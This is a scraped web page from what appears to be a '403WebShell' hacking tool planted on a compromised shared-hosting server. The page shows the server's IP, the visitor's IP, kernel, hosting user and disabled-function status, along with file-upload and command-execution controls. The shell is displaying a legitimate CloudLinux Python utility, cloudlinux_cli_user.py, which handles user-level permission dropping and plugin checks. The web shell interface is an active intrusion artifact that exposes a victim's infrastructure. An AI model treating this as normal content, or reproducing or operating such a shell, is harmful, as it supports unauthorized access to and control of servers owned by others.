Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 3.22.68.29
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/share/l.v.e-manager/utils/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/share/l.v.e-manager/utils/cloudlinux_cli_user.py
# coding:utf-8

# Copyright © Cloud Linux GmbH & Cloud Linux Software, Inc 2010-2019 All Rights Reserved
#
# Licensed under CLOUD LINUX LICENSE AGREEMENT
# http://cloudlinux.com/docs/LICENSE.TXT

from __future__ import print_function
from __future__ import division
from __future__ import absolute_import

import json
import logging
import subprocess
import os
import sys

from libcloudlinux import (
    CloudlinuxCliBase, LVEMANAGER_PLUGIN_NAMES, DEFAULT_PLUGIN_NAME, PASSENGER_DEPEND_PLUGINS,
    AllLimitStrategy, NoLimitStrategy, LimitStrategyHeavy, NoCagefsStrategy, LimitStrategyBase, ConfigLimitValue,
)
from clselector.clpassenger_detectlib import is_clpassenger_active
from clcommon import ClPwd
from clcommon.utils import is_litespeed_running
from clcommon.lib.cledition import is_cl_solo_edition
from cldetectlib import get_param_from_file
from clcommon.const import Feature
from clcommon.cpapi import is_panel_feature_supported


CONFIG = '/etc/sysconfig/cloudlinux'
SMART_ADVICE_USER_CLI = '/opt/alt/php-xray/cl-smart-advice-user'
PERCENTS_STATS_MODE_FLAG = '/opt/cloudlinux/flags/enabled-flags.d/percentage-user-stats-mode.flag'

# NB: this logger's out is stderr, result JSON out is stdout - so with active logger web will not work properly
#       because of stderr redirection 2>&1
#       so it is MUST be silent(NOTSET) in normal situation
# also it is not possible to use file logger here - script works inside the cagefs with user's rights
logger = logging.getLogger(__name__)
logger.setLevel(logging.NOTSET)
init_formatter = logging.Formatter('[%(asctime)s] %(funcName)s:%(lineno)s - %(message)s')
cagefs_formatter = logging.Formatter('{cagefs} [%(asctime)s] %(funcName)s:%(lineno)s - %(message)s')
h = logging.StreamHandler()
h.setFormatter(init_formatter)
logger.addHandler(h)


logger.debug('cli start')


class CloudlinuxCliUser(CloudlinuxCliBase):
    limit_strategy: LimitStrategyBase

    def __init__(self):
        self.web_resource_limit_mode = ConfigLimitValue.ALL
        limit_mode = get_param_from_file(CONFIG, 'web_resource_limit_mode', '=', ConfigLimitValue.ALL.value)
        self.web_resource_limit_mode = ConfigLimitValue(limit_mode)
        super(CloudlinuxCliUser, self).__init__()
        self.command_methods.update({
            'spa-get-domains': self.spa_user_domains,
            'spa-get-homedir': self.spa_user_homedir,
            'cloudlinux-snapshots': self.cl_snapshots,
            'spa-get-user-info': self.spa_get_user_info
        })

    def __init_limit_strategy(self):
        """
        Set default strategy from the `CONFIG` values
        """
        if self.skip_cagefs_check:
            logger.handlers[0].setFormatter(cagefs_formatter)     # update log format to easier log review

        # we cannot use cagefs when it is not available
        if not is_panel_feature_supported(Feature.CAGEFS):
            self.limit_strategy = NoCagefsStrategy()
        else:
            self.limit_strategy = {
                ConfigLimitValue.ALL: AllLimitStrategy,
                ConfigLimitValue.HEAVY: LimitStrategyHeavy,
                ConfigLimitValue.UNLIMITED: NoLimitStrategy,
            }.get(self.web_resource_limit_mode, AllLimitStrategy)()
        logger.debug(
            f'Limits strategy inited as {self.limit_strategy.__class__}'
            f'\n\tBecause of:'
            f'\n\tself.web_resource_limit_mode: {self.web_resource_limit_mode}'
        )

    def set_limit_strategy(self, strategy: LimitStrategyBase):
        logger.debug(f'Limit strategy is explicitly set to {strategy.__class__}')
        self.limit_strategy = strategy

    def __check_exclusive_commands(self):
        """
        Check is command currently run without cagefs; commands list is taken from Spa.php `processRequest()`
        This function should be removed in the same task as the `LimitStrategyNoCagefs`
        """
        data = self.request_data
        if data.get('params', {}).get('interpreter') == 'php' or data.get('command') in {
            'cloudlinux-statistics',
            'cloudlinux-quota',
            'cloudlinux-top',
            'cloudlinux-snapshots',
            'cloudlinux-charts',
            'cloudlinux-statsnotifier',
            'spa-get-user-info',
            'cloudlinux-awp-user',
            'cloudlinux-xray-user-manager',
            'spa-get-domains',
            'cpanel-api',
            'cl-smart-advice-user',
        }:
            logger.debug('Executable command found in the exclusive list')
            self.set_limit_strategy(NoCagefsStrategy())

    def drop_permission(self):
        """
        Drop permission to users, if owner of script is user
        :return:
        """
        logger.debug(
            'drop permissions start'
            f'\n\targv is: {sys.argv}'
            f'\n\trequest data is: {self.request_data}'
        )
        self.__init_limit_strategy()
        data = self.request_data
        if data['owner'] != 'user':
            self.exit_with_error("User not allowed")
        super(CloudlinuxCliUser, self).drop_permission()

        args = self.prepair_params_for_command()
        logger.debug(f'prepared args is: {args}')

        if data.get('command'):
            if self.skip_cagefs_check:
                logger.debug('cagefs skipped: --skip-cagefs-check arg found')
            else:
                self.__check_exclusive_commands()
                # if rc is None - script won't enter the cagefs
                # otherwise - command is executed in the cagefs
                rc = self.limit_strategy.execute(data['command'], args, self.request_data)
                if rc is not None:
                    logger.debug(f'command executed inside of the cagefs with rc: {rc}')
                    sys.exit(rc)
                else:
                    logger.debug(f'cagefs skipped: strategy is {self.limit_strategy.__class__}')

        # skip checking plugin availability on spa-get-user-info
        if data.get('command') != 'spa-get-user-info':
            self.check_plugin_availability()
        logger.debug('drop permissons end')

    def spa_user_domains(self):
        print(json.dumps({"result": "success", "list": self.get_user_domains()}))
        sys.exit(0)

    def spa_user_homedir(self):
        print(json.dumps({"result": "success", "homedir": self.get_user_homedir()}))
        sys.exit(0)

    def spa_get_user_info(self):
        try:
            print(json.dumps(
                {
                    "result": "success",
                    "domains": self.get_user_domains(),
                    "homedir": self.get_user_homedir(),
                    "is_litespeed_running": is_litespeed_running(),
                    "is_cl_solo_edition": is_cl_solo_edition(skip_jwt_check=True),
                    "smart_advice": os.path.isfile(SMART_ADVICE_USER_CLI),
                    "is_lve_supported": is_panel_feature_supported(Feature.LVE),
                    "user_stats_mode": self.get_stats_mode(),
                    "server_ip": self.get_server_ip()
                }))
        except:
                self.exit_with_error('Module unavailable')
        sys.exit(0)

    def get_user_domains(self):
        try:
            from clcommon.cpapi import userdomains
        except:
            self.exit_with_error('Module unavailable')
        return [x[0] for x in userdomains(self.user_info['username'])]

    def get_stats_mode(self):
        if os.path.isfile(PERCENTS_STATS_MODE_FLAG):
            return 'percent'
        return 'default'

    def get_user_homedir(self):
        try:
            pwdir = ClPwd().get_homedir(self.user_info['username'])
            return pwdir + "/"
        except KeyError:
            self.exit_with_error('No such user')

    def cl_snapshots(self):
        list_to_request = self.prepair_params_for_command()
        try:
            output = self.run_util('/usr/sbin/lve-read-snapshot', *list_to_request)
        except subprocess.CalledProcessError as processError:
            output = processError.output
        try:
            result = json.loads(output)
        except:
            self.exit_with_error(output)
            return
        self.exit_with_success({'data': result['data']})
        sys.exit(0)

    def check_plugin_availability(self):
        plugin_names = {
            'nodejs_selector': 'Node.js Selector',
            'python_selector': 'Python Selector',

        }
        selector_enabled = True
        manager = None
        try:
            if self.current_plugin_name == 'nodejs_selector':
                from clselect.clselectnodejs.node_manager import NodeManager
                manager = NodeManager()
            if self.current_plugin_name == 'python_selector':
                from clselect.clselectpython.python_manager import PythonManager
                manager = PythonManager()
            if manager:
                selector_enabled =  manager.selector_enabled
        except:
            selector_enabled = False
        if not selector_enabled:
            self.exit_with_error(
                code=503,
                error_id='ERROR.not_available_plugin',
                context={'pluginName': plugin_names.get(self.current_plugin_name, 'Plugin')},
                icon='disabled')
        plugin_available_checker = {
            'nodejs_selector': self._plugin_available_nodejs,
            'python_selector': self._plugin_available_python,
            'php_selector': self._plugin_available_php,
            'resource_usage': self._plugin_available_resource_usage,
        }.get(self.current_plugin_name)
        if plugin_available_checker:
            plugin_available = plugin_available_checker()
        else:
            plugin_available = True

        if not is_clpassenger_active() and self.current_plugin_name in PASSENGER_DEPEND_PLUGINS:
            self.exit_with_error(
                code=503,
                error_id='ERROR.not_available_passenger',
                context={'pluginName': LVEMANAGER_PLUGIN_NAMES.get(self.current_plugin_name, DEFAULT_PLUGIN_NAME)},
                icon='disabled')
        if not plugin_available:
            self.exit_with_error(
                code=503,
                error_id='ERROR.not_available_plugin',
                context={'pluginName': LVEMANAGER_PLUGIN_NAMES.get(self.current_plugin_name, DEFAULT_PLUGIN_NAME)},
                icon='disabled')

    def _plugin_available_nodejs(self):
        try:
            from clselect.clselectnodejs.node_manager import NodeManager
            manager = NodeManager()
            if not manager.selector_enabled or not is_clpassenger_active():
                return False
        except:
            return False
        return True

    def _plugin_available_python(self):
        try:
            from clselect.clselectpython.python_manager import PythonManager
            manager = PythonManager()
            if not manager.selector_enabled or not is_clpassenger_active():
                return False
        except:
            return False
        return True

    def _plugin_available_php(self):
        try:
            from clselect.clselectphp.php_manager import PhpManager
            manager = PhpManager()
            if not manager.selector_enabled:
                return False
        except:
            return False
        return True

    def _plugin_available_resource_usage(self):
        return True

Youez - 2016 - github.com/yon3zu
LinuXploit